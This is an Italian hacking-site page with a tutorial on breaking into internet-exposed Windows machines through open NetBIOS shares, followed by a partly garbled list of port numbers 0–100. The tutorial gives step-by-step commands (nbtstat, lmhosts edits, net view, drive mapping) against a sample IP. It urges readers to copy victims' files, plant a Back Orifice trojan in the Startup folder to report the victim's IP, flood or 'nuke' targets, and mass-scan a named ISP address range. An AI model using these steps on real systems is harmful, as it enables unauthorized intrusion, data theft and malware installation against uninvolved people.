(¯`·._.·[°o.OKinG-InFeTO.o°]·._.·´¯)


Vai ai contenuti

Menu principale:


PC NetBiossati

Hå¢kÎñG

#HACKING DEI COMPUTER NETBIOSSATI#

* Introduzione:

Il Netbios?? Che è?. Il Netbios è una cosina fatta da Microsfott ® che serve a sfruttare le reti locali LAN IPX. Dato che il nostro caro amico Bill è fissato con integrare tutto con internet ha integrato pure questo Netbios, rendendolo facilmente accessibile da chiunque via rete. Ma che simpatico questo nostro caro amico Bill.

 

* Configurazione del pc:

Per sfruttare le risorse di questa miniera d'oro chiamata netbios bisogna configurare il proprio pc con su montato winzozz ™. Eh si mi dispiace ma il caro sistema disoperativo del vecchio Bill è necessario. Ora andate nelle proprietà della vostra connessione di accesso remoto, in tipi di server, e mettete accedi alla rete. Fatto ciò andate in avvio/impostazioni/pannello di controllo/rete e aggiungete i seguenti client:

 

Client per reti microsoft

Client per reti netware (che automaticamente aggiungerà il protocollo compatibile IPX/SPX, se non lo fa fatelo voi)

 

E il protocollo Netbios.

Fatto ciò andate nelle proprietà del client per reti microsoft e selezionate connessione rapida, dopodiché nelle proprietà del protocollo compatibile IPX/SPX mettete attiva Netbios. Fate OK e dopo aver installato i driver (per i piratoni ci vuole il cd di windows) riavviate il pc. Ora siete pronti per fare kasino!!!

 

* Hacking dei computer Netbiossati:

Volendo fare un po' di teoria vi dirò che il Netbios lavora sulla porta 139 TCP/UDP (si proprio quella del winnuke).

Prima di tutto beccate un computer col sysadmin scemo e il Netbios attivo (come farlo ve lo spiego dopo). Vi faccio un esempio pratico così anche i più grulli capiscono come funziona la cosa (senza offesa per i più grulli hihi =)).

Allora io becco l'ip della macchina (212.216.34.144) poi vado nel prompt di msdos (evvivaa niente winzozz ™ per ora) e scrivo:

 

cd x:/windows

nbtstat -A 212.216.34.144

 

Vi risponderà:

 

NetBIOS Remote Machine Name Table

 

Name Type Status

----------------------------------------------------------------------------

HALL9000 <00> UNIQUE Registered

WORKGROUP <00> UNIQUE Registered

HALL9000 <03> UNIQUE Registered

HALL9000 <20> UNIQUE Registered

WORKGROUP <1E> UNIQUE Registered

 

A questo punto ci segniamo il primo nome della lista, HALL9000 (notate che nel Netbios tutto è scritto maiuscolo), e facciamo:

 

edit x:/windows/lmhosts

 

Nell'editor del dos scriviamo:

 

212.216.34.144 HALL9000 #PRE

 

Il tag #PRE è fisso e va sempre messo, gli spazi sono fatti col TAB (non usate altro). Salvate e uscite. Ora per caricare questo file scrivete:

 

nbtstat -R

 

Vi dovrebbe rispondere (se vi risponde altro o avete sbagliato a editare il file oppure avete configurato male il pc):

 

Successful purge and preload of the NBT Remote Cache Name Table.

 

Ora vediamo se ci sono risorse condivise nel pc. Fate:

 

net view //HALL9000

 

Se non ci sono risorse condivise o non si ha il permesso di accedervi vi risponderà con un errore, altrimenti vi dirà:

 

Risorse condivise su //HALL9000

 

Condivisione Tipo Commento

________________________________________________

 

C Disco

D Disco

E Disco

F Disco

G Disco

HP Stampa

Esecuzione comando riuscita.

 

Tombola!! Ci siamo abbiamo i nomi delle sue risorse condivise. Ora basta uscire dal dos e andare in gestione risorse (si avete letto bene). Nel menu in alto andate in Strumenti/Connetti unità di rete. Ora come avrete già capito si assegna una lettera al vostro "nuovo hd" che avrete (cioè l'hd dell'altro) e scrivete //HALL9000/C per esplorare la condivisione C (che probabilmente sarà il C: del tipo), //HALL9000/D per la condivisione D e così via. Avrete notato sicuramente che oltre ai vari dischi li c'è anche la condivisione HP di tipo "Stampa". Vuol dire semplicemente che quella condivisione è connessa alla stampante del tipo e potete stampare i vostri file con la sua stampante.. divertente no? =). Naturalmente sarà tutto abbastanza lento perché avverrà via internet, non sarà come esplorare i vostri hd di certo. Bene ora che sapete come accedere agli hd passiamo a cose più importanti. Prima di tutto vi chiederete come fare a prendere e a mettere file. E' semplice, dato che l'hd in remoto è come se fosse il vostro, quindi basta fare copia e incolla. Come fare invece per eseguire i file? Non è così semplice come pensiate, cliccando sul file .exe in remoto si eseguirà sul VOSTRO pc (ovviamente) quindi dovete giocare d'astuzia. Se volete mettere un trojan settatelo in modo da mandarvi una email con l'ip ogni volta che il pc va online, dopodiché mettete questo trojan in c:/windows/menu avvio/programmi/esecuzione automatica/ oppure in c:/windows/start menu/program files/startup (non ne sono sicuro però, non ho la versione inglese di windows). Poi fate in modo di riavviare il pc se è un server fisso, altrimenti aspettate il giorno dopo (per vedere se è un server guardate la lista di ID dell'nbtstat -A, se ce ne sono più di 4-5 allora probabilmente è server). Smurfatelo, nukkatelo, provate tutto. Consiglio di usare il BO dato che all'avvio si cancella da esecuzione automatica. Inoltre quando entrate con gestione risorse se il sysadmin è un po' furbo vi verrà chiesta una password (non preoccupatevi, ciò è molto raro). Exploits o un brute force per queste password purtroppo non ne conosco, se voi si allora mandatemi informazioni. Ultima cosa, quando i nomi degli ID o delle condivisioni contengono spazi dovete usare gli "". Ad esempio se con nbtstat -A troviamo il nome TRA LLA allora nel lmhosts dovremo scrivere:

 

numero_ip "TRA LLA" #PRE

 

E poi

 

net view "//TRA LLA"

 

E se vediamo che ha una condivisione chiamata BLA BLA allora faremo in gestione risorse:

 

"//TRA LLA/BLA BLA".

 

* Trovare i computer Netbiossati:

Questo è molto semplice, basta un programma chiamato Legion (lo trovate su http://rhino9.ml.org o al mio sito http://kalidor.tsx.org) che scanna dei range di ip. Io consiglio di provare sempre il dominio 212.216.* dato che ho scoperto che quella zona è strapiena di ip Netbiossati (infatti è la zona principale della TIN;-)).

 

* Ultima parola:

L'articolo è finito, spero sia stato esauriente, cmq se avete domande scrivetemi mailto:[email protected].

 

---Enzo~Hacker---

 

E QUESTE SONO UN Paio di porte da me testate

 

Keyword Decimal Description References

------- ------- ----------- ----------

0/tcp Reserved

0/udp Reserved

tcpmux 1/tcp TCP Port Service Multiplexer

tcpmux 1/udp TCP Port Service Multiplexer

compressnet 2/tcp Management Utility

compressnet 2/udp Management Utility

compressnet 3/tcp Compression Process

compressnet 3/udp Compression Process

# 4/tcp Unassigned#

4/udp Unassigned

rje 5/tcp Remote Job Entry

rje 5/udp Remote Job Entry

# 6/tcp Unassigned#

6/udp Unassigned

echo 7/tcp Echoecho

7/udp Echo

# 8/tcp Unassigned

# 8/udp Unassigneddiscard

9/tcp Discard

discard 9/udp Discard

# 10/tcp Unassigned#

10/udp Unassigned

systat 11/tcp Active Userssystat

11/udp Active Users

# 12/tcp Unassigned#

12/udp Unassigned

daytime 13/tcp Daytimedaytime

13/udp Daytime

# 14/tcp Unassigned#

14/udp Unassigned

# 15/tcp Unassigned [was netstat]

# 15/udp Unassigned#

16/tcp Unassigned

# 16/udp Unassignedqotd

17/tcp Quote of the Day

qotd 17/udp Quote of the Day

msp 18/tcp Message Send Protocol

msp 18/udp Message Send Protocol

chargen 19/tcp Character Generator

chargen 19/udp Character Generator

ftp-data 20/tcp File Transfer [Default Data]

ftp-data 20/udp File Transfer [Default Data]

ftp 21/tcp File Transfer [Control]

ftp 21/udp File Transfer [Control]

ssh 22/tcp secure shell

ssh 22/udp secure shell

telnet 23/tcp Telnet

telnet 23/udp Telnet

Telnet RFC 854

24/tcp any private mail system

24/udp any private mail system

smtp 25/tcp Simple Mail Transfer

smtp 25/udp Simple Mail Transfer

# 26/tcp Unassigned#

26/udp Unassigned

nsw-fe 27/tcp NSW User System FE

nsw-fe 27/udp NSW User System FE

# 28/tcp Unassigned#

28/udp Unassigned

msg-icp 29/tcp MSG ICPmsg-icp

29/udp MSG ICP

# 30/tcp Unassigned#

30/udp Unassigned

msg-auth 31/tcp MSG Authentication

msg-auth 31/udp MSG Authentication

# 32/tcp Unassigned#

32/udp Unassigned

dsp 33/tcp Display Support Protocol

dsp 33/udp Display Support Protocol

# 34/tcp Unassigned#

34/udp Unassigned

35/tcp any private printer server

35/udp any private printer server

# 36/tcp Unassigned#

36/udp Unassigned

time 37/tcp Timetime

37/udp Time

rap 38/tcp Route Access Protocol

rap 38/udp Route Access Protocol

rlp 39/tcp Resource Location Protocol

rlp 39/udp Resource Location Protocol

# 40/tcp Unassigned#

40/udp Unassigned

graphics 41/tcp Graphicsgraphics

41/udp Graphics

nameserver 42/tcp Host Name Server

nameserver 42/udp Host Name Servernicname

43/tcp Who Is

nicname 43/udp Who Ismpm-flags

44/tcp MPM FLAGS Protocol

mpm-flags 44/udp MPM FLAGS Protocol

mpm 45/tcp Message Processing Module [recv]

mpm 45/udp Message Processing Module [recv]

mpm-snd 46/tcp MPM [default send]

mpm-snd 46/udp MPM [default send]

ni-ftp 47/tcp NI FTP

ni-ftp 47/udp NI FTP

auditd 48/tcp Digital Audit Daemon

auditd 48/udp Digital Audit Daemon

login 49/tcp Login Host Protocol

login 49/udp Login Host Protocol

re-mail-ck 50/tcp Remote Mail Checking Protocol

re-mail-ck 50/udp Remote Mail Checking Protocol

la-maint 51/tcp IMP Logical Address Maintenance

la-maint 51/udp IMP Logical Address Maintenance

xns-time 52/tcp XNS Time Protocol

xns-time 52/udp XNS Time Protocol

domain 53/tcp Domain Name Server

domain 53/udp Domain Name Server

xns-ch 54/tcp XNS Clearinghouse

xns-ch 54/udp XNS Clearinghouse

isi-gl 55/tcp ISI Graphics Language

isi-gl 55/udp ISI Graphics Language

xns-auth 56/tcp XNS Authentication

xns-auth 56/udp XNS Authentication

57/tcp any private terminal access

57/udp any private terminal access

xns-mail 58/tcp XNS Mailxns-mail

58/udp XNS Mail

59/tcp any private file service

59/udp any private file service

60/tcp Unassigned

60/udp Unassigned

ni-mail 61/tcp NI MAILni-mail

61/udp NI MAIL

acas 62/tcp ACA Servicesacas

62/udp ACA Services

# 63/tcp Unassigned#

63/udp Unassigned

covia 64/tcp Communications Integrator (CI)

covia 64/udp Communications Integrator (CI)

tacacs-ds 65/tcp TACACS-Database Service

tacacs-ds 65/udp TACACS-Database Service

sql*net 66/tcp Oracle SQL*NET

sql*net 66/udp Oracle SQL*NET

bootps 67/tcp Bootstrap Protocol Server

bootps 67/udp Bootstrap Protocol Server

bootpc 68/tcp Bootstrap Protocol Client

bootpc 68/udp Bootstrap Protocol Client

tftp 69/tcp Trivial File Transfer

tftp 69/udp Trivial File Transfer

gopher 70/tcp Gophergopher

70/udp Gopher

netrjs-1 71/tcp Remote Job Service

netrjs-1 71/udp Remote Job Service

netrjs-2 72/tcp Remote Job Service

netrjs-2 72/udp Remote Job Service

netrjs-3 73/tcp Remote Job Service

netrjs-3 73/udp Remote Job Service

netrjs-4 74/tcp Remote Job Service

netrjs-4 74/udp Remote Job Service

75/tcp any private dial out service

75/udp any private dial out service

deos 76/tcp Distributed External Object Store

deos 76/udp Distributed External Object Store

77/tcp any private RJE service

77/udp any private RJE service

vettcp 78/tcp vettcpvettcp

78/udp vettcp

finger 79/tcp Finger

finger 79/udp Finger

www-http 80/tcp World Wide Web HTTP

www-http 80/udp World Wide Web HTTP

hosts2-ns 81/tcp HOSTS2 Name Server

hosts2-ns 81/udp HOSTS2 Name Server

xfer 82/tcp XFER Utilityxfer

82/udp XFER Utility

mit-ml-dev 83/tcp MIT ML Devicemit-ml-dev

83/udp MIT ML Device

ctf 84/tcp Common Trace Facility

ctf 84/udp Common Trace Facility

mit-ml-dev 85/tcp MIT ML Devicemit-ml-dev

85/udp MIT ML Device

mfcobol 86/tcp Micro Focus Cobol

mfcobol 86/udp Micro Focus Cobol

87/tcp any private terminal link

87/udp any private terminal link

kerberos 88/tcp Kerberos

88/udp Kerberos

su-mit-tg 89/tcp SU/MIT Telnet Gateway

su-mit-tg 89/udp SU/MIT Telnet Gateway

dnsix 90/tcp DNSIX Securit Attribute Token Map

dnsix 90/udp DNSIX Securit Attribute Token Map

mit-dov 91/tcp MIT Dover Spooler

mit-dov 91/udp MIT Dover Spooler

npp 92/tcp Network Printing Protocol

npp 92/udp Network Printing Protocol

dcp 93/tcp Device Control Protocol

dcp 93/udp Device Control Protocol

objcall 94/tcp Tivoli Object Dispatcher

objcall 94/udp Tivoli Object Dispatcher

supdup 95/tcp SUPDUPsupdup

95/udp SUPDUP

dixie 96/tcp DIXIE Protocol Specification

dixie 96/udp DIXIE Protocol Specification

swift-rvf 97/tcp Swift Remote Vitural File Protocol

swift-rvf 97/udp Swift Remote Vitural File Protocol

tacnews 98/tcp TAC Newstacnews

98/udp TAC News

metagram 99/tcp Metagram Relay

metagram 99/udp Metagram Relay

newacct 100/tcp [unauthorized use]

 

Creative Commons License
Questo sito è pubblicato sotto una Licenza Creative Commons

Home Page | Regole dell'Hacker | Contattaci | Hå¢kÎñG | VìRû§ | Video TuToRial | Hå¢kÎñG M§Ñ | ÐC++ | Wìñdøw$ Xþ | Mappa del sito


Sito protetto da CoPyRiGhT 2008/2009 | [email protected]

Torna ai contenuti | Torna al menu